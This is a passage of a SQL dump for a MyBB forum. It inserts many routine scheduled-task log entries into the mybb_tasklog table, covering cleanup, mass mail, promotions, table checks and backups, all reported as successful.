hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14183', '3', '1351796432', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14182', '9', '1351796425', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14181', '5', '1351795591', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14180', '9', '1351795427', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14179', '3', '1351794854', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14178', '9', '1351794383', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14177', '5', '1351794354', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14176', '9', '1351793415', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14175', '5', '1351793128', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14174', '7', '1351792833', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14173', '1', '1351792830', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14172', '3', '1351792744', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14171', '9', '1351792509', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14170', '5', '1351791918', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14169', '9', '1351791654', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14168', '3', '1351791021', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14167', '9', '1351790872', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14166', '5', '1351790864', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14165', '9', '1351789831', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14164', '5', '1351789706', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14163', '7', '1351789696', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14162', '1', '1351789681', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14161', '3', '1351789675', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14160', '9', '1351789675', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14159', '9', '1351788422', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14158', '5', '1351788404', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14157', '7', '1351788396', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14156', '1', '1351788389', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14155', '3', '1351788305', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14154', '9', '1351786749', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14153', '5', '1351785093', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14152', '9', '1351784644', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14151', '3', '1351783969', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14150', '9', '1351783947', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14149', '5', '1351783929', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14148', '9', '1351782802', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14147', '5', '1351782321', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14146', '7', '1351782073', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14145', '1', '1351782034', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14144', '3', '1351781981', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14143', '9', '1351781916', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14142', '5', '1351781274', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14141', '9', '1351780923', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14140', '3', '1351780411', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14139', '9', '1351779993', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14138', '5', '1351779931', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14137', '9', '1351779045', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14136', '5', '1351778966', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14135', '7', '1351778964', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14134', '1', '1351778957', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14133', '3', '1351778956', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14132', '5', '1351778459', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14131', '9', '1351778451', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14130', '3', '1351776769', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14129', '9', '1351776478', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14128', '5', '1351776464', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14127', '9', '1351775405', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14126', '5', '1351775169', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14125', '7', '1351774932', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14124', '1', '1351774909', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14123', '3', '1351774795', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14122', '9', '1351774529', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14121', '5', '1351774403', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14120', '9', '1351774280', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14119', '3', '1351773471', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14118', '9', '1351773468', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14117', '5', '1351773450', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14116', '5', '1351772005', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14115', '7', '1351771997', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14114', '1', '1351771989', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14113', '3', '1351771924', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14112', '9', '1351771913', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14111', '5', '1351770832', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14110', '9', '1351770222', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14109', '3', '1351769458', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14108', '7', '1351769136', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14107', '1', '1351769129', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14106', '3', '1351769119', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14105', '9', '1351769111', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14104', '5', '1351769102', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14103', '5', '1351761753', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14102', '7', '1351761637', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14101', '1', '1351761610', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14100', '3', '1351761602', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14099', '9', '1351761597', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14098', '5', '1351759517', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14097', '9', '1351759286', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14096', '3', '1351758809', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14095', '9', '1351758803', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14094', '5', '1351758323', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14093', '5', '1351757712', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14092', '7', '1351757688', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14091', '1', '1351757649', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14090', '3', '1351757628', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14089', '9', '1351757619', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14088', '5', '1351756332', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14087', '9', '1351756327', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14086', '3', '1351755151', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14085', '9', '1351754728', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14084', '5', '1351754712', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14083', '9', '1351754346', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14082', '5', '1351753588', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14081', '7', '1351753583', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14080', '1', '1351753580', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14079', '3', '1351753571', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14078', '9', '1351752969', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14077', '5', '1351752304', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14076', '9', '1351752126', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14075', '3', '1351751566', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14074', '9', '1351751251', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14073', '5', '1351751105', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14072', '9', '1351750222', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14071', '5', '1351749908', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14070', '7', '1351749628', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14069', '1', '1351749624', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14068', '3', '1351749544', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14067', '9', '1351749387', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14066', '5', '1351748941', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14065', '9', '1351748938', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14064', '3', '1351748352', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14063', '9', '1351747538', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14062', '5', '1351747529', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14061', '7', '1351747462', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('14060', '1', '1351747450', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14059', '3', '1351747058', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14058', '9', '1351746534', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14057', '5', '1351746063', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14056', '9', '1351744824', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14055', '3', '1351744221', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14054', '9', '1351743918', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14053', '5', '1351743910', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14052', '9', '1351743107', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14051', '5', '1351742875', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14050', '8', '1351742826', 'The log cleanup task successfully ran and pruned any old logs.'); INSERT INTO mybb_tasklog VALUES('9144', '5', '1349844759', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9143', '3', '1349844752', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9142', '9', '1349844749', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9141', '5', '1349843553', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9140', '9', '1349842287', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9139', '5', '1349841946', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9138', '11', '1349841744', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9137', '7', '1349841724', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9136', '2', '1349841695', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9135', '1', '1349841655', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9134', '3', '1349841634', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9133', '3', '1349841393', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9132', '9', '1349841379', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9131', '5', '1349840926', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9130', '9', '1349839136', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9129', '7', '1349838762', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9128', '5', '1349838762', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9127', '1', '1349838708', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9126', '3', '1349837972', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9125', '9', '1349837716', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9124', '5', '1349837188', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9123', '9', '1349836924', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9122', '3', '1349836314', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9121', '9', '1349836062', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9120', '5', '1349835988', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9119', '9', '1349835010', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9118', '5', '1349834927', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9117', '7', '1349834408', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9116', '1', '1349834405', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9115', '3', '1349834366', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9114', '9', '1349834362', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9113', '5', '1349833528', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9112', '9', '1349833444', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9111', '3', '1349832783', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9110', '9', '1349832385', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9109', '5', '1349832376', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9108', '9', '1349831415', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9107', '5', '1349831103', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9106', '7', '1349830866', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9105', '1', '1349830858', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9104', '3', '1349830742', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9103', '9', '1349830550', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9102', '5', '1349829904', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9101', '9', '1349829648', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9100', '3', '1349829012', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9099', '9', '1349828820', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9098', '5', '1349828727', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9097', '9', '1349827872', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9096', '5', '1349827504', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9095', '7', '1349827370', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9094', '1', '1349827333', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9093', '3', '1349827174', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9092', '9', '1349826947', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9091', '5', '1349826384', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9090', '9', '1349826076', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9089', '3', '1349825438', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9088', '9', '1349825117', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9087', '5', '1349825110', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9086', '9', '1349824211', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9085', '5', '1349823903', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9084', '7', '1349823605', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9083', '1', '1349823602', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9082', '3', '1349823548', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9081', '9', '1349823305', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9080', '5', '1349822707', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9079', '9', '1349822517', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9078', '3', '1349822071', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9077', '9', '1349821872', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9076', '5', '1349821836', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9075', '9', '1349820669', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9074', '5', '1349820415', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9073', '7', '1349820397', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9072', '1', '1349820396', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9071', '3', '1349820392', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9070', '9', '1349819892', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9069', '5', '1349819546', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9068', '9', '1349818814', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9067', '3', '1349818470', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9066', '5', '1349817919', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9065', '9', '1349817914', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9064', '5', '1349816757', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9063', '7', '1349816584', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9062', '1', '1349816583', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9061', '3', '1349816581', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9060', '9', '1349816581', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9059', '5', '1349815658', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9058', '9', '1349815654', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9057', '3', '1349814742', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9056', '9', '1349814406', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9055', '5', '1349814326', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9054', '9', '1349813472', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9053', '5', '1349813110', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9052', '7', '1349812841', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9051', '1', '1349812806', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9050', '3', '1349812742', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9049', '9', '1349812519', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9048', '5', '1349811910', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9047', '9', '1349811615', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9046', '3', '1349811006', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9045', '9', '1349810733', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9044', '5', '1349810727', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9043', '9', '1349809858', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9042', '5', '1349809531', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9041', '7', '1349809232', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9040', '1', '1349809229', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9039', '3', '1349809141', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9038', '9', '1349808925', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9037', '5', '1349808649', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9036', '9', '1349808647', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9035', '3', '1349807645', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9034', '5', '1349807636', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9033', '9', '1349807630', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9032', '7', '1349807203', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9031', '1', '1349807176', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9030', '3', '1349806699', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9029', '5', '1349805985', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9028', '9', '1349805370', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9027', '3', '1349803827', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9026', '9', '1349803809', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9025', '5', '1349803684', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9024', '7', '1349803387', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9023', '1', '1349803078', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9022', '3', '1349803064', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9021', '9', '1349802600', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9020', '5', '1349802592', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9019', '9', '1349800866', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9018', '3', '1349800633', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9017', '9', '1349800627', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9016', '5', '1349800189', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9015', '5', '1349799645', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9014', '7', '1349799600', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9013', '4', '1349799595', 'The database backup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9012', '1', '1349799528', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9011', '3', '1349799527', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9010', '9', '1349799511', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9009', '5', '1349797808', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9008', '9', '1349797798', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9007', '3', '1349796600', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9006', '9', '1349796359', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9005', '5', '1349796301', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9004', '9', '1349795922', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9003', '5', '1349795915', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9002', '7', '1349795908', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('9001', '1', '1349795491', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('9000', '3', '1349794864', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8999', '9', '1349794549', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8998', '5', '1349794430', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8997', '3', '1349794427', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8996', '9', '1349794237', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8995', '5', '1349793619', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8994', '9', '1349791992', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8993', '7', '1349791809', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('8992', '1', '1349791799', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8991', '3', '1349791734', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8990', '9', '1349791733', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8989', '5', '1349791621', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8988', '9', '1349790174', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8987', '3', '1349789426', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8986', '9', '1349789413', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8985', '5', '1349789220', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8984', '9', '1349788383', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8983', '5', '1349787948', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8982', '7', '1349787651', 'The check tables task successfully ran with no corrupted tables found.'); INSERT INTO mybb_tasklog VALUES('8981', '1', '1349787618', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8980', '3', '1349787586', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8979', '9', '1349787347', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8978', '5', '1349786704', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8977', '9', '1349786413', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8976', '3', '1349786082', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8975', '9', '1349786076', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8974', '5', '1349786034', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('8973', '9', '1349784612', 'The 